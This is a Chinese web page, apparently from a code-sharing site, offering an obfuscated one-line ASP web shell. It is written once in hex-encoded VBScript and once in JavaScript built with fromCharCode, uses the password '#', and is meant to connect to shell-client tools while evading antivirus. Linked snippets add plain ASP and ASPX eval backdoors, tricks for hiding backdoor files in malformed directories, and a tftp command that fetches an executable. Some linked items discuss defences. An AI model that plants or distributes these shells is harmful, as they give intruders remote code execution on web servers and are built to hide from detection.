更牛的一句话asp木马加密(去掉asp里的%)
<script language=vbs runat=server>
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
HextoStr="EXECUTE """""
C="&CHR(&H"
N=")"
Do While Len(data)>1
If IsNumeric(Left(data,1)) Then
HextoStr=HextoStr&C&Left(data,2)&N
data=Mid(data,3)
Else
HextoStr=HextoStr&C&Left(data,4)&N
data=Mid(data,5)
End If
Loop
End Function
</script>
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode(
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,1
04,40,101,41,123,125))</SCRIPt>
不过加密后就不是一句话了,哈哈。这个s端用海阳或冰狐都可以连得上的,密码是#。
其实只是换写了<script language=vbs runat=server> 这种方式,里边的代码可以用js或vbs等多种加密方式来加密解密了,省得asp只有微软
的那个东东可以加密,同时省去了asp里的%号而已。当然不加密也可以,调用<script language=vbs runat=server>那还是一句话,加密主要
是为了躲过杀毒软件。
相关推荐
-
防范ASP木马的十大基本原则强列建议看下
由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求. 几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改.数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施.鉴于大部
-
ASP防止图片木马上传的代码
ASP木马防御: 复制代码 代码如下: const adTypeBinary=1 dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8) dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D) dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H4
-
一句话木马的原理及利用分析(asp,aspx,php,jsp)
一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("
-
有效防止ASP木马上传运行—小知识[网络安全技术]
一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一 前使用IIS服务器的站长很多,特别是对于ASP网站来说,防止ASP木马成了网站安全最关键的内容. 一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scr
-
如何防范ASP木马
修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_
-
ASP下检测图片木马的函数代码
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张"合 '法的"图片,进而实现了上传ASP木马的目的. ' 防范方法:因为这种木马是图片与木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), '则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第
-
asp,php一句话木马整理方便查找木马
特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["
-
隐藏ASP木马后门的两种方法
1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir
-
asp.net jscript 一句话木马
min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x
-
一句话 asp木马加密版 彻底突破杀毒软件
不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H
-
一款不错的asp木马 黑色界面
<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617" '密码 mName="BY:.尐飛" '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权 Server.ScriptTimeout=9
-
asp一句话木马原理分析
通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们
-
aspx超强木马查杀与防范(web网马)
复制代码 代码如下: <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><
随机推荐
- 深入解析JavaScript框架Backbone.js中的事件机制
- vmware虚拟机NAT配置静态IP教程详解
- 常用正则表达式知识点解读及判读有效数字、手机号邮箱正则表达式
- C# double和decimal数据类型以截断的方式保留指定的小数位数
- Java基础教程之组合(composition)
- 详解IOS 利用storyboard修改UITextField的placeholder文字颜色
- javascript判断机器是否联网的2种方法
- .net的序列化与反序列化实例
- 九种防MDB数据库被下载的方法小结
- php中__destruct与register_shutdown_function执行的先后顺序问题
- 使用graphics.py实现2048小游戏
- Android 安全加密:消息摘要Message Digest详解
- jQuery 借助插件Lavalamp实现导航条动态美化效果
- jQuery插件HighCharts实现的2D回归直线散点效果示例【附demo源码下载】
- %time:~0,2% %%内的意思详解
- 视觉直观感受若干常用排序算法
- javascript 数组排序与对象排序的实例
- 用Javascript轻松制作一套简单的抽奖系统
- Linux 系统命令精通指南
- 什么才是真正的VPS!---VPS内幕大揭密!!